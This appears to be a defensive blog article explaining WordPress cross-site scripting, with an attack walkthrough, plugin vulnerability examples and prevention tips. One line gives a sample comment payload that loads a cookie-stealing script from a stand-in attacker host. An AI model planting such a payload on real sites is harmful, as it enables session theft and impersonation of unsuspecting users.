What is WordPress XSS Exploit? How to Remove It?
Symptoms of WordPress XSS exploit
- Stored cross-site scripting means the hacker has injected a malicious script into a vulnerable page, which is run every time an unsuspecting victim visits the infected page.
- Reflected cross-site scripting is when an attacker injects malicious code inside a single HTTP request and the injected payload is included in the response with no security measures taken to prevent its execution. What makes Reflected XSS different is that the injected payload is not stored anywhere on the web application.
- Hacker (H) creates an account on your website.
- H observes that your website contains a stored XSS vulnerability. If someone posts a comment containing HTML tags in it, the tags will be displayed as it is, and any script tags get to run.
- In the comment section of an article, H inserts text with a script tag like:
I am in love with your website <script src="http://mallorysevilsite.com/authstealer.js">
- When a user (U) loads the page with the comment, the script tag runs and steals U’s authorization cookie
- The stolen cookie gets sent to H’s secret server enabling him to impersonate the unsuspecting user U.
Consequences of WordPress XSS exploit
Cross-Site Request Forgery
Examples of WordPress XSS Exploit
Slimstat plugin exploit (May 2019)
Facebook Messenger Live Chat
update_zb_fbc_codeis accessible to anyone.
wp_ajax_update_zb_fbc_codeis prescribed for authorized users only &
wp_ajax_nopriv_update_zb_fbc_codeis for non-privileged users. Both use the same function “
update_zb_fbc_code“. This allows any user (logged in or not) to modify the plugin settings. Malicious actors could use this vulnerability to gain higher priority access to confidential information.
Prevention of WordPress XSS exploit
Update WordPress files
Filter_var PHP Function
Encode data on output